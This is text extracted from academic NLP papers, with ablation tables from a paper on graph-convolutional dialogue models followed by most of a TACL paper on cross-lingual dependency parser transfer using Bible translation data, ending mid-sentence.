GCN-SeA+Freq 48.4 56.1 66.2 56.7 64.0 73.3 GCN-SeA+PPMI 48.9 56.7 66.1 56.9 64.1 73.0 Ta-DSTC2 GCN-SeA+Freq 49.2 64.1 69.5 59.0 67.1 76.7 GCN-SeA+PPMI 50.7 64.9 70.2 59.9 67.9 77.9 Table 7: RNN+GCN-SeA with different contextual graphs on all DSTC2 datasets 15 Under review as a conference paper at ICLR 2019 D. ABLATION RESULTS Dataset Model per-resp.acc BLEU ROUGE Entity F1 1 2 L Hi-DSTC2 Seq2seq-Bahdanau Attn 48.0 55.1 62.9 52.5 61.0 74.3 GCN-Bahdanau Attn 38.5 50.4 58.9 47.7 56.7 59.1 RNN+GCN-Bahdanau Attn 47.1 56.0 65.1 55.2 62.9 72.2 RNN-SeA 45.8 55.9 65.1 55.5 63.1 71.8 RNN+GCN-SeA 49.2 57.1 66.4 56.8 64.4 75.9 Be-DSTC2 Seq2seq-Bahdanau Attn 50.4 55.6 67.4 57.6 65.1 76.2 GCN-Bahdanau Attn 42.1 55.1 63.7 52.8 61.1 64.3 RNN+GCN-Bahdanau Attn 47.0 57.7 67.0 57.4 64.6 70.9 RNN-SeA 46.8 58.5 67.6 58.1 65.1 71.9 RNN+GCN-SeA 50.3 59.2 69.0 59.4 66.6 75.1 Gu-DSTC2 Seq2seq-Bahdanau Attn 47.7 54.5 64.8 54.9 62.6 71.3 GCN-Bahdanau Attn 38.8 49.5 59.2 48.3 56.8 58.0 RNN+GCN-Bahdanau Attn 46.5 55.5 65.6 55.9 63.4 70.6 RNN-SeA 45.4 56.0 66.0 56.6 63.9 69.8 RNN+GCN-SeA 48.9 56.7 66.1 56.9 64.1 73.0 Ta-DSTC2 Seq2seq-Bahdanau Attn 49.3 62.9 67.8 56.3 65.6 77.7 GCN-Bahdanau Attn 42.0 59.3 64.8 52.8 62.1 69.7 RNN+GCN-Bahdanau Attn 46.3 63.2 68.0 57.2 65.6 72.1 RNN-SeA 46.8 64.0 69.3 59.0 67.1 74.2 RNN+GCN-SeA 50.7 64.9 70.2 59.9 67.9 77.9 En-DSTC2 Seq2seq-Bahdanau Attn 46.0 57.3 67.2 56.0 64.9 67.1 GCN-Bahdanau Attn 45.7 58.1 66.5 55.9 64.1 70.1 RNN+GCN-Bahdanau Attn 47.4 59.5 67.9 57.7 65.6 72.9 RNN-SeA 47.0 60.2 68.5 58.9 66.2 72.7 RNN+GCN-SeA 51.4 61.2 69.6 60.2 67.4 77.9 Table 8: Ablation results of various models on all versions of DSTC2. 16 Introduction Related Work Background GCN for Undirected Graphs Syntactic GCN Model Query Encoder Dialogue History Encoder KB Encoder Sequential Attention Decoder Contextual Graph Creation Experimental setup Datasets Hyperparameters Models Compared Results and Discussions Conclusion work_44qds2wxfnh3tncnwfvuffhoau ---- Cross-Lingual Syntactic Transfer with Limited Resources Mohammad Sadegh Rasooli and Michael Collins∗ Department of Computer Science, Columbia University New York, NY 10027, USA {rasooli,mcollins}@cs.columbia.edu Abstract We describe a simple but effective method for cross-lingual syntactic transfer of depen- dency parsers, in the scenario where a large amount of translation data is not available. This method makes use of three steps: 1) a method for deriving cross-lingual word clus- ters, which can then be used in a multilingual parser; 2) a method for transferring lexical information from a target language to source language treebanks; 3) a method for integrat- ing these steps with the density-driven annota- tion projection method of Rasooli and Collins (2015). Experiments show improvements over the state-of-the-art in several languages used in previous work, in a setting where the only source of translation data is the Bible, a con- siderably smaller corpus than the Europarl corpus used in previous work. Results using the Europarl corpus as a source of translation data show additional improvements over the results of Rasooli and Collins (2015). We con- clude with results on 38 datasets from the Uni- versal Dependencies corpora. 1 Introduction Creating manually-annotated syntactic treebanks is an expensive and time consuming task. Recently there has been a great deal of interest in cross-lingual syntactic transfer, where a parsing model is trained for some language of interest, using only treebanks in other languages. There is a clear motivation for this in building parsing models for languages for which treebank data is unavailable. Methods ∗On leave at Google Inc. New York. for syntactic transfer include annotation projection methods (Hwa et al., 2005; Ganchev et al., 2009; McDonald et al., 2011; Ma and Xia, 2014; Rasooli and Collins, 2015; Lacroix et al., 2016; Agić et al., 2016), learning of delexicalized models on univer- sal treebanks (Zeman and Resnik, 2008; McDon- ald et al., 2011; Täckström et al., 2013; Rosa and Zabokrtsky, 2015), treebank translation (Tiedemann et al., 2014; Tiedemann, 2015; Tiedemann and Agić, 2016) and methods that leverage cross-lingual rep- resentations of word clusters, embeddings or dictio- naries (Täckström et al., 2012; Durrett et al., 2012; Duong et al., 2015a; Zhang and Barzilay, 2015; Xiao and Guo, 2015; Guo et al., 2015; Guo et al., 2016; Ammar et al., 2016a). This paper considers the problem of cross-lingual syntactic transfer with limited resources of mono- lingual and translation data. Specifically, we use the Bible corpus of Christodouloupoulos and Steed- man (2014) as a source of translation data, and Wikipedia as a source of monolingual data. We de- liberately limit ourselves to the use of Bible trans- lation data because it is available for a very broad set of languages: the data from Christodouloupou- los and Steedman (2014) includes data from 100 languages. The Bible data contains a much smaller set of sentences (around 24,000) than other transla- tion corpora, for example Europarl (Koehn, 2005), which has around 2 million sentences per language pair. This makes it a considerably more challeng- ing corpus to work with. Similarly, our choice of Wikipedia as the source of monolingual data is mo- tivated by the availability of Wikipedia data in a very broad set of languages. 279 Transactions of the Association for Computational Linguistics, vol. 5, pp. 279–293, 2017. Action Editor: Yuji Matsumoto. Submission batch: 5/2016; Revision batch: 10/2016; 2/2017; Published 8/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. We introduce a set of simple but effective methods for syntactic transfer, as follows: • We describe a method for deriving cross- lingual clusters, where words from different languages with a similar syntactic or seman- tic role are grouped in the same cluster. These clusters can then be used as features in a shift- reduce dependency parser. • We describe a method for transfer of lexical in- formation from the target language into source language treebanks, using word-to-word trans- lation dictionaries derived from parallel cor- pora. Lexical features from the target language can then be integrated in parsing. • We describe a method that integrates the above two approaches with the density-driven ap- proach to annotation projection described by Rasooli and Collins (2015). Experiments show that our model outperforms previous work on a set of European languages from the Google universal treebank (McDonald et al., 2013). We achieve 80.9% average unlabeled at- tachment score (UAS) on these languages; in com- parison the work of Zhang and Barzilay (2015), Guo et al. (2016) and Ammar et al. (2016b) have a UAS of 75.4%, 76.3% and 77.8%, respectively. All of these previous works make use of the much larger Europarl (Koehn, 2005) corpus to derive lex- ical representations. When using Europarl data in- stead of the Bible, our approach gives 83.9% accu- racy, a 1.7% absolute improvement over Rasooli and Collins (2015). Finally, we conduct experiments on 38 datasets (26 languages) in the universal depen- dencies v1.3 (Nivre et al., 2016) corpus. Our method has an average unlabeled dependency accuracy of 74.8% for these languages, more than 6% higher than the method of Rasooli and Collins (2015). Thir- teen datasets (10 languages) have accuracies higher than 80.0%.1 2 Background This section gives a description of the underlying parsing models used in our experiments, the data 1 The parser code is available at https://github. com/rasoolims/YaraParser/tree/transfer. sets used, and a baseline approach based on delexi- calized parsing models. 2.1 The Parsing Model We assume that the parsing model is a discriminative linear model, where given a sentence x, and a set of candidate parses Y(x), the output from the model is y∗(x) = arg max y∈Y(x) θ ·φ(x,y) where θ ∈ Rd is a parameter vector, and φ(x,y) is a feature vector for the pair (x,y). In our experi- ments we use the shift-reduce dependency parser of Rasooli and Tetreault (2015), which is an extension of the approach in Zhang and Nivre (2011). The parser is trained using the averaged structured per- ceptron (Collins, 2002). We assume that the feature vector φ(x,y) is the concatenation of three feature vectors: • φ(p)(x,y) is an unlexicalized set of features. Each such feature may depend on the part-of- speech (POS) tag of words in the sentence, but does not depend on the identity of individual words in the sentence. • φ(c)(x,y) is a set of cluster features. These fea- tures require access to a dictionary that maps each word in the sentence to an underlying cluster identity. Clusters may, for example, be learned using the Brown clustering algorithm (Brown et al., 1992). The features may make use of cluster identities in combination with POS tags. • φ(l)(x,y) is a set of lexicalized features. Each such feature may depend directly on word iden- tities in the sentence. These features may also depend on part-of-speech tags or cluster infor- mation, in conjunction with lexical informa- tion. Appendix A has a complete description of the fea- tures used in our experiments. 2.2 Data Assumptions Throughout this paper we will assume that we have m source languages L1 . . .Lm, and a single tar- get language Lm+1. We assume the following data sources: 280 Source language treebanks. We have a treebank Ti for each language i ∈{1 . . .m}. Part-of-speech (POS) data. We have hand- annotated POS data for all languages L1 . . .Lm+1. We assume that the data uses a universal POS set that is common across all languages. Monolingual data. We have monolingual, raw text for each of the (m+ 1) languages. We use Di to refer to the monolingual data for the ith language. Translation data. We have translation data for all language pairs. We use Bi,j to refer to transla- tion data for the language pair (i,j) where i,j ∈ {1 . . . (m + 1)} and i 6= j. In our main experiments we use the Google universal treebank (McDonald et al., 2013) as our source language treebanks2 (this treebank pro- vides universal dependency relations and POS tags), Wikipedia data as our monolingual data, and the Bible from Christodouloupoulos and Steedman (2014) as the source of our translation data. In ad- ditional experiments we use the Europarl corpus as a source of translation data, in order to measure the impact of using the smaller Bible corpus. 2.3 A Baseline Approach: Delexicalized Parsers with Self-Training Given the data assumption of a universal POS set, the feature vectors φ(p)(x,y) can be shared across languages. A simple approach is then to simply train a delexicalized parser using treebanks T1 . . .Tm, us- ing the representation φ(x,y) = φ(p)(x,y) (see (McDonald et al., 2013; Täckström et al., 2013)). Our baseline approach makes use of a delexical- ized parser, with two refinements: WALS properties. We use the six properties from the World Atlas of Language Structures (WALS) (Dryer and Haspelmath, 2013) to select a subset of closely related languages for each target language. These properties are shown in Table 1. The model for a target language is trained on treebank data from languages where at least 4 out of 6 WALS prop- erties are common between the source and target 2We also train our best performing model on the newly re- leased universal treebank v1.3 (Nivre et al., 2016). See §4.3 for more details. Feature Description 82A Order of subject and verb 83A Order of object and verb 85A Order of adposition and noun phrase 86A Order of genitive and noun 87A Order of adjective and noun 88A Order of demonstrative and noun Table 1: The six properties from the world atlas of lan- guage structures (WALS) (Dryer and Haspelmath, 2013) used to select the source languages for each target lan- guage in our experiments. language.3 This gives a slightly stronger baseline. Our experiments showed an improvement in aver- age labeled dependency accuracy for the languages from 62.52% to 63.18%. Table 2 shows the set of source languages used for each target language. These source languages are used for all experiments in the paper. Self-training. We use self-training (McClosky et al., 2006) to further improve parsing performance. Specifically, we first train a delexicalized model on treebanks T1 . . .Tm; then use the resulting model to parse a dataset Tm+1 that includes target-language sentences which have POS tags but do not have de- pendency structures. We finally use the automati- cally parsed data T ′m+1 as the treebank data and re- train the model. This last model is trained using all features (unlexicalized, clusters, and lexicalized). Self-training in this way gives an improvement in la- beled accuracy from 63.18% to 63.91%. 2.4 Translation Dictionaries Our only use of the translation data Bi,j for i,j ∈ {1 . . . (m + 1)} is to construct a translation dictio- nary t(w,i,j). Here i and j are two languages, w is a word in language Li, and the output w′ = t(w,i,j) is a word in language Lj corresponding to the most frequent translation of w into this language. We define the function t(w,i,j) as follows: We first run the GIZA++ alignment process (Och and Ney, 2003) on the data Bi,j. We then keep inter- sected alignments between sentences in the two lan- guages. Finally, for each word w in Li, we define 3There was no effort to optimize this choice; future work may consider more sophisticated sharing schemes. 281 Target Sources en de, fr, pt, sv de en, fr, pt es fr, it, pt fr en, de, es, it, pt, sv it es, fr, pt pt en, de, es, fr, it, sv sv en, fr, pt Table 2: The selected source languages for each target language in the Google universal treebank v2 (McDonald et al., 2013). A language is chosen as a source language if it has at least 4 out of 6 WALS properties in common with the target language. w′ = t(w,i,j) to be the target language word most frequently aligned to w in the aligned data. If a word w is never seen aligned to a target language word w′, we define t(w,i,j) = NULL. 3 Our Approach We now describe an approach that gives significant improvements over the baseline. §3.1 describes a method for deriving cross-lingual clusters, allowing us to add cluster features φ(c)(x,y) to the model. §3.2 describes a method for adding lexical features φ(l)(x,y) to the model. §3.3 describes a method for integrating the approach with the density-driven ap- proach of Rasooli and Collins (2015). Finally, §4 describes experiments. We show that each of the above steps leads to improvements in accuracy. 3.1 Learning Cross-Lingual Clusters We now describe a method for learning cross- lingual clusters. This follows previous work on cross-lingual clustering algorithms (Täckström et al., 2012). A clustering is a function C(w) that maps each word w in a vocabulary to a cluster C(w) ∈ {1 . . .K}, where K is the number of clusters. A hi- erarchical clustering is a function C(w,l) that maps a word w together with an integer l to a cluster at level l in the hierarchy. As one example, the Brown clustering algorithm (Brown et al., 1992) gives a hi- erarchical clustering. The level l allows cluster fea- tures at different levels of granularity. A cross-lingual hierarchical clustering is a func- tion C(w,l) where the clusters are shared across the (m + 1) languages of interest. That is, the word w Inputs: 1) Monolingual texts Di for i = 1 . . . (m + 1); 2) a function t(w,i,j) that translates a word w ∈ Li to w′ ∈Lj ; and 3) a parameter α such that 0 < α < 1. Algorithm: D = {} for i = 1 to m + 1 do for each sentence s ∈Di do for p = 1 to |s| do Sample ā ∼ [0, 1) if ā ≥ α then continue Sample j ∼ unif{1, ...,m + 1}\{i} w′ = t(sp, i,j) if w′ 6= NULL then Set sp = w′ D = D∪ {s} Use the algorithm of Stratos et al. (2015) on D to learn a clustering C. Output: The clustering C. Figure 1: An algorithm for learning a cross-lingual clus- tering. In our experiments we used the parameter value α = 0.3. can be from any of the (m + 1) languages. Ideally, a cross-lingual clustering should put words across different languages which have a similar syntactic and/or semantic role in the same cluster. There is a clear motivation for cross-lingual clustering in the parsing context. We can use the cluster-based fea- tures φ(c)(x,y) on the source language treebanks T1 . . .Tm, and these features will now generalize be- yond these treebanks to the target language Lm+1. We learn a cross-lingual clustering by leverag- ing the monolingual data sets D1 . . .Dm+1, together with the translation dictionaries t(w,i,j) learned from the translation data. Figure 1 shows the algo- rithm that learns a cross-lingual clustering. The al- gorithm first prepares a multilingual corpus, as fol- lows: for each sentence s in the monolingual data Di, for each word in s, with probability α, we re- place the word with its translation into some ran- domly chosen language. Once this data is created, we can easily obtain a cross-lingual clustering. Fig- ure 1 shows the complete algorithm. The intuition behind this method is that by creating the cross- lingual data in this way, we bias the clustering al- 282 gorithm towards putting words that are translations of each other in the same cluster. 3.2 Treebank Lexicalization We now describe how to introduce lexical repre- sentations φ(l)(x,y) to the model. Our approach is simple: we take the treebank data T1 . . .Tm for the m source languages, together with the transla- tion lexicons t(w,i,m + 1). For any word w in the source treebank data, we can look up its transla- tion t(w,i,m + 1) in the lexicon, and add this trans- lated form to the underlying sentence. Features can now consider lexical identities derived in this way. In many cases the resulting translation will be the NULL word, leading to the absence of lexical fea- tures. However, the representations φ(p)(x,y) and φ(c)(x,y) still apply in this case, so the model is ro- bust to some words having a NULL translation. 3.3 Integration with the Density-Driven Projection Method of Rasooli and Collins (2015) In this section we describe a method for integrating our approach with the cross-lingual transfer method of Rasooli and Collins (2015), which makes use of density-driven projections. In annotation projection methods (Hwa et al., 2005; McDonald et al., 2011), it is assumed that we have translation data Bi,j for a source and target language, and that we have a dependency parser in the source language Li. The translation data con- sists of pairs (e,f) where e is a source language sentence, and f is a target language sentence. A method such as GIZA++ is used to derive an align- ment between the words in e and f, for each sen- tence pair; the source language parser is used to parse e. Each dependency in e is then potentially transferred through the alignments to create a de- pendency in the target sentence f. Once dependen- cies have been transferred in this way, a dependency parser can be trained on the dependencies in the tar- get language. The density-driven approach of Rasooli and Collins (2015) makes use of various definitions of “density” of the projected dependencies. For exam- ple, P100 is the set of projected structures where the projected dependencies form a full projective parse tree for the sentence; P80 is the set of projected structures where at least 80% of the words in the pro- jected structure are a modifier in some dependency. An iterative training process is used, where the pars- ing algorithm is first trained on the set T100 of com- plete structures, and where progressively less dense structures are introduced in learning. We integrate our approach with the density-driven approach of Rasooli and Collins (2015) as follows: consider the treebanks T1 . . .Tm created using the lexicalization method of §3.2. We add all trees in these treebanks to the set P100 of full trees used to initialize the method of Rasooli and Collins (2015). In addition we make use of the representations φ(p),φ(c) and φ(l), throughout the learning process. 4 Experiments This section first describes the experimental settings, then reports results. 4.1 Data and Tools Data In the first set of experiments, we consider 7 European languages studied in several pieces of pre- vious work (Ma and Xia, 2014; Zhang and Barzi- lay, 2015; Guo et al., 2016; Ammar et al., 2016a; Lacroix et al., 2016). More specifically, we use the 7 European languages in the Google universal tree- bank (v.2; standard data) (McDonald et al., 2013). As in previous work, gold part-of-speech tags are used for evaluation. We use the concatenation of the treebank training sentences, Wikipedia data and the Bible monolingual sentences as our monolingual raw text. Table 3 shows statistics for the monolin- gual data. We use the Bible from Christodouloupou- los and Steedman (2014), which includes data for 100 languages, as the source of translations. We also conduct experiments with the Europarl data (both with the original set and a subset of it with the same size as the Bible) to study the effects of translation data size and domain shift. The statistics for transla- tion data is shown in Table 4. In a second set of experiments, we run experi- ments on 38 datasets (26 languages) in the more re- cent Universal Dependencies v1.3 corpus (Nivre et al., 2016). The full set of languages we use is listed in Table 9.4 We use the Bible as the translation data, 4We excluded languages that are not completely present in the Bible of Christodouloupoulos and Steedman (2014) (An- 283 and Wikipedia as the monolingual text. The standard training, development and test set splits are used in all experiments. The development sets are used for analysis, given in §5 of this paper. Lang. en de es fr it pt sv #Sen. 31.8 20.0 13.6 13.6 10.1 6.1 3.9 #Token 750.5 408.2 402.3 372.1 311.1 169.3 60.6 #Type 3.8 6.1 2.7 2.4 2.1 1.6 1.3 Table 3: Sizes of the monolingual datasets for each of our languages. All numbers are in millions. Brown Clustering Algorithm We use the off-the- shelf Brown clustering tool5 (Liang, 2005) to train monolingual Brown clusters with 500 clusters. The monolingual Brown clusters are used as features over lexicalized values created in φ(l), and in self- training experiments. We train our cross-lingual clustering with the off-the-shelf-tool6 from Stratos et al. (2015). We set the window size to 2 with a cluster size of 500.7 Parsing Model We use the k-beam arc-eager de- pendency parser of Rasooli and Tetreault (2015), which is similar to the model of Zhang and Nivre (2011). We modify the parser such that it can use both monolingual and cross-lingual word clus- ter features. The parser is trained using the the max- imum violation update strategy (Huang et al., 2012). We use three epochs of training for all experiments. We use the DEPENDABLE Tool (Choi et al., 2015) to calculate significance tests on several of the com- parisons (details are given in the captions to tables 5, 6, and 9). cient Greek, Basque, Catalan, Galician, Gothic, Irish, Kazakh, Latvian, Old Church Slavonic, and Tamil). We also excluded Arabic, Hebrew, Japanese and Chinese, as these languages have tokenization and/or morphological complexity that goes beyond the scope of this paper. Future work should consider these lan- guages. 5https://github.com/percyliang/ brown-cluster 6https://github.com/karlstratos/singular 7Usually the original Brown clusters are better features for parsing but their training procedure does not scale well to large datasets. Therefore we use the more efficient algorithm from Stratos et al. (2015) on the larger cross-lingual datasets to obtain word clusters. Data Lang. en de es fr it pt sv Bible tokens 1.5M 665K 657K 732K 613K 670K 696K types 16K 20K 27K 22K 29K 29K 23K EU-S tokens 718K 686K 753K 799K 717K 739K 645K types 22K 41K 31K 27K 30K 32K 39K Europarl tokens 56M 50M 57M 62M 55M 56M 46M types 133K 400K 195K 153K 188K 200K 366K Table 4: Statistics for the Bible, sampled Europarl (EU- S) and Europarl datasets. Each individual Bible text file from Christodouloupoulos and Steedman (2014) consists of 24720 sentences, except for English datasets, where two translations into English are available, giving dou- ble the amount of data. Each text file from the sampled Europarl datasets consists of 25K sentences and Europarl has approximately 2 million sentences per language pair. L Baseline This paper using the Bible §3.1 §3.2 §3.3 LAS UAS LAS UAS LAS UAS LAS UAS en 58.2 65.5 65.0 72.3 66.3 74.0 70.8 76.5 de 49.7 59.1 51.6 59.7 54.9 62.6 65.2 72.8 es 68.3 77.2 73.1 79.6 76.6 81.9 76.7 82.1 fr 67.3 77.7 69.5 79.9 74.4 81.9 75.8 82.2 it 69.7 79.4 71.6 80.0 74.7 82.8 76.1 83.3 pt 71.5 77.5 76.9 81.5 81.0 84.4 81.3 84.7 sv 62.6 74.2 63.5 75.1 68.2 78.7 71.2 80.3 avg 63.9 72.9 67.3 75.5 70.9 78.1 73.9 80.3 Table 5: Performance of different models in this paper; first the baseline model, then models trained using the methods described in sections §3.1–3.3. All results make use of the Bible as a source of translation data. All differ- ences in UAS and LAS are statistically significant with p < 0.001 using McNemar’s test, with the exception of “de” UAS/LAS Baseline vs. 3.1 (i.e., 49.7 vs 51.6 UAS and 59.1 vs 59.7 LAS are not significant differences). Word alignment We use the intersected align- ments from GIZA++ (Och and Ney, 2003) on trans- lation data. We exclude sentences in translation data with more than 100 words. 4.2 Results on the Google Treebank Table 5 shows the dependency parsing accuracy for the baseline delexicalized approach, and for models which add 1) cross-lingual clusters (§3.1); 2) lexical features (§3.2); and 3) integration with the density- driven method of Rasooli and Collins (2015). Each of these three steps gives significant improvements in performance. The final LAS/UAS of 73.9/80.3% is several percentage points higher than the baseline accuracy of 63.9/72.9%. 284 Lang. Bible Europarl-Sample Europarl Density This Paper Density This Paper Density This Paper LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS en 59.1 66.4 70.8 76.5 64.3 72.8 70.2 76.2 68.4 76.3 71.1 77.5 de 60.2 69.5 65.2 72.8 61.6 72.0 64.9 73.0 73.0 79.7 75.6 82.1 es 70.3 76.8 76.7 82.1 72.0 78.3 76.0 81.5 74.6 80.9 76.6 82.6 fr 69.9 76.9 75.8 82.2 71.9 79.0 75.7 82.5 76.3 82.7 77.4 83.9 it 71.1 78.5 76.1 83.3 73.2 80.4 76.2 82.9 77.0 83.7 77.4 84.4 pt 72.1 76.4 81.3 84.7 75.3 79.7 81.61 84.8 77.3 82.1 82.1 85.6 sv 66.5 76.3 71.2 80.3 71.9 80.6 73.5 81.6 75.6 84.1 76.9 84.5 avg 67.0 75.7 73.9 80.3 70.0 77.6 74.0 80.4 74.6 81.3 76.7 82.9 Table 6: Results for our method using different sources of translation data. “Density” refers to the method of Rasooli and Collins (2015); “This paper” gives results using the methods described in sections 3.1–3.3 of this paper. The “Bible” experiments use the Bible data of Christodouloupoulos and Steedman (2014). The “Europarl” experiments use the Europarl data of Koehn (2005). The “Europarl-Sample” experiments use 25K randomly chosen sentences from Europarl; this gives a similar number of sentences to the Bible data. All differences in LAS and UAS in this table between the density and “this paper” settings (i.e., for the Bible, Europarl-Sample and Europarl settings) are found to be statistically significant according to McNemar’s sign test. Lang. MX14 LA16 ZB15 GCY16 AMB16 RC15 This paper Supervised Bible Europarl UAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS LAS UAS en – – 59.8 70.5 – – – – 68.4 76.3 70.8 76.5 71.1 77.5 92.0 93.8 de 74.3 76.0 54.1 62.5 55.9 65.0 57.1 65.2 73.0 79.7 65.2 72.8 75.6 82.1 79.4 85.3 es 75.5 78.9 68.3 78.0 73.0 79.0 74.6 80.2 74.6 80.9 76.7 82.1 76.0 82.6 82.3 86.7 fr 76.5 80.8 68.8 78.9 71.0 77.6 73.9 80.6 76.3 82.7 75.8 82.2 77.4 83.9 81.7 86.3 it 77.7 79.4 69.4 79.3 71.2 78.4 72.5 80.7 77.0 83.7 76.1 83.3 77.4 84.4 86.1 88.8 pt 76.6 – 72.5 78.6 78.6 81.8 77.0 81.2 77.3 82.1 81.3 84.7 82.1 85.6 87.6 89.4 sv 79.3 83.0 62.5 75.0 69.5 78.2 68.1 79.0 75.6 84.1 71.2 80.3 76.9 84.5 84.1 88.1 avg\en 76.7 – 65.9 75.4 69.3 76.3 70.5 77.8 75.6 82.2 74.4 80.9 77.7 83.9 83.5 87.4 Table 7: Comparison of our work using the Bible and Europarl data, with previous work: MX14 (Ma and Xia, 2014), LA16 (Lacroix et al., 2016), ZB15 (Zhang and Barzilay, 2015), GCY16 (Guo et al., 2016), AMB 16 (Ammar et al., 2016b), and RC15 (Rasooli and Collins, 2015). “Supervised” refers to the performance of the parser trained on fully gold standard data in a supervised fashion (i.e. the practical upper-bound of our model). “avg\en” refers to the average accuracy for all datasets except English. Comparison to the Density-Driven Approach us- ing Europarl Data Table 6 shows accuracies for the density-driven approach of Rasooli and Collins (2015), first using Europarl data8 and second using the Bible alone (with no cross-lingual clusters or lex- icalization). The Bible data is considerably smaller than Europarl (around 100 times smaller), and it can be seen that results using the Bible are several per- centage points lower than the results for Europarl (75.7% UAS vs. 81.3% UAS). Integrating cluster- based and lexicalized features described in the cur- rent paper with the density-driven approach closes much of this gap in performance (80.3% UAS). Thus we have demonstrated that we can get close to the performance of the Europarl-based models using 8Rasooli and Collins (2015) do not report results on English. We use the same setting to obtain the English results. only the Bible as a source of translation data. Us- ing our approach on the full Europarl data gives an average UAS of 82.9%, an improvement from the 81.3% UAS of Rasooli and Collins (2015). Table 6 also shows results when we use a random subset of the Europarl data, in which the number of sentences (25,000) is chosen to give a very similar size to the Bible. It can be seen that accuracies using the Bible vs. the Europarl-Sample are very similar (80.3% vs. 80.4% UAS), suggesting that the size of the translation corpus is much more important than the genre. Comparison to Other Previous Work Table 7 compares the accuracy of our method to the follow- ing related work: 1) Ma and Xia (2014), who de- scribe an annotation projection method based on en- tropy regularization; 2) Lacroix et al. (2016), who 285 Lang. RC15 This Paper (§3.3) Bible Europarl LAS UAS LAS UAS LAS UAS en 66.2 74.4 67.8 74.4 68.0 75.1 de 71.6 78.8 61.9 70.3 73.6 80.8 es 72.3 79.2 73.8 79.9 74.2 80.7 fr 73.5 80.8 72.6 79.9 75.0 82.3 it 74.9 82.0 74.0 81.7 75.3 82.6 pt 75.4 80.7 79.2 83.3 80.4 84.4 sv 73.4 82.0 67.3 77.2 73.7 82.2 avg 72.5 79.7 70.9 78.1 74.3 81.2 Table 8: The final results based on automatic part of speech tags. RC15 refers to the best performing model of Rasooli and Collins (2015). describe an annotation projection method based on training on partial trees with dynamic oracles; 3) Zhang and Barzilay (2015), who describe a method that learns cross-lingual embeddings and bilingual dictionaries from Europarl data, and uses these fea- tures in a discriminative parsing model; 4) Guo et al. (2016), who describe a method that learns cross- lingual embeddings from Europarl data and uses a shift-reduce neural parser with these representa- tions; 5) Ammar et al. (2016b)9, who use the same embeddings as Guo et al. (2016), within an LSTM- based parser; and 6) Rasooli and Collins (2015) who use the density-driven approach on the Europarl data. Our method gives significant improvements over the first three models, in spite of using the Bible translation data rather than Europarl. When using the Europarl data, our method improves the state-of- the-art model of Rasooli and Collins (2015). Performance with Automatic POS Tags For completeness, Table 8 gives results for our method with automatic part-of-speech tags. The tags are ob- tained using the model of Collins (2002)10 trained on the training part of the treebank dataset. Future work should study approaches that transfer POS tags in addition to dependencies. 4.3 Results on the Universal Dependencies v1.3 Table 9 gives results on 38 datasets (26 languages) from the newly released universal dependencies cor- pus (Nivre et al., 2016). Given the number of tree- banks and to speed up training, we pick source lan- 9This work was later published under a different title (Am- mar et al., 2016a) without including UAS results. 10https://github.com/rasoolims/ SemiSupervisedPosTagger Dataset Density This paper Supervised LAS UAS LAS UAS LAS UAS it 74.3 81.3 79.8 86.1 88.4 90.7 sl 68.2 75.9 78.6 84.1 86.3 89.1 es 69.1 77.5 76.3 84.1 83.5 86.9 bg 66.2 79.5 72.0 83.6 85.5 90.5 pt 66.7 75.8 74.8 83.4 83.0 86.7 es-ancora 68.9 77.5 74.6 83.1 86.5 89.4 fr 72.0 77.9 76.6 82.6 84.5 87.1 sv-lines 67.5 76.7 73.3 82.4 81.0 85.4 pt-br 68.3 75.2 76.2 82.0 87.8 89.7 sv 65.9 75.7 71.7 81.3 83.6 87.7 no 71.7 78.8 74.3 81.2 88.0 90.5 pl 65.4 77.6 70.1 81.0 85.1 90.3 hr 55.8 70.2 65.9 80.9 76.2 85.1 cs-cac 61.1 70.3 69.0 78.5 82.4 87.6 da 63.1 72.8 68.3 77.8 80.8 84.3 en-lines 67.0 75.9 68.6 77.3 80.7 84.6 cs 59.0 68.1 67.2 76.4 84.5 88.7 id 38.0 55.7 57.8 76.0 79.8 85.1 de 61.3 72.8 64.9 75.7 80.2 85.8 ru-syntagrus 56.0 70.7 61.6 75.3 82.0 87.8 ru 56.7 64.8 65.4 74.8 71.9 77.7 cs-cltt 57.5 65.4 65.6 74.7 77.1 81.4 ro 54.6 67.4 60.7 74.6 78.2 85.3 la 54.5 71.6 55.7 72.8 43.1 52.5 nl-lassysmall 51.5 62.6 61.9 71.7 76.5 80.6 el 53.7 66.7 59.6 71.0 79.1 83.1 et 48.9 65.6 56.9 70.9 75.9 82.9 hi 34.4 50.6 49.9 69.9 89.4 92.9 hu 26.1 48.9 55.0 69.9 69.5 79.4 en 59.7 68.1 61.8 69.0 85.3 88.1 fi-ftb 50.3 63.2 56.5 67.5 73.3 79.7 fi 49.8 60.8 57.3 66.4 73.4 78.2 la-ittb 44.1 55.4 51.8 62.8 76.2 80.9 nl 40.6 49.4 50.1 62.0 70.1 75.0 la-proiel 43.6 60.3 45.0 61.3 64.9 72.9 sl-sst 42.4 59.2 47.6 60.6 63.4 70.4 fa 44.4 53.2 46.5 56.0 84.1 87.5 tr 05.3 18.5 32.7 51.9 65.6 78.8 Average 56.7 68.1 64.0 74.8 78.9 83.8 Table 9: Results for the density driven method (Rasooli and Collins, 2015) and ours using the Bible data on the universal dependencies v1.3 (Nivre et al., 2016). The ta- ble is sorted by the performance of our method. The last major columns shows the performance of the supervised parser. The abbreviations are as follows: bg (Bulgarian), cs (Czech), da (Danish), de (German), el (Greek), en (En- glish), es (Spanish), et (Estonian), fa (Persian (Farsi)), fi (Finnish), fr (French), hi (Hindi), hr (Croatian), hu (Hun- garian), id (Indonesian), it (Italian), la (Latin), nl (Dutch), no (Norwegian), pl (Polish), pt (Portuguese), ro (Roma- nian), ru (Russian), sl (Slovenian), sv (Swedish), and tr (Turkish). All differences in LAS and UAS in this ta- ble were found to be statistically significant according to McNemar’s sign test with p < 0.001. guages that have at least 5 out of 6 common WALS properties with each target language. Our experi- ments are carried out using the Bible as our transla- 286 tion data. As shown in Table 9, our method consis- tently outperforms the density-driven method of Ra- sooli and Collins (2015) and for many languages the accuracy of our method gets close to the accuracy of the supervised parser. In all the languages, our method is significantly better than the density-driven method using the McNemar’s test with p < 0.001. Accuracy on some languages (e.g., Persian (fa) and Turkish (tr)) is low, suggesting that future work should consider more powerful techniques for these languages. There are two important facts to note. First, the number of fully projected trees in some languages is so low such that the density-driven ap- proach cannot start with a good initialization to fill in partial dependencies. For example Turkish has only one full tree with only six words, Persian with 25 trees, and Dutch with 28 trees. Second, we ob- 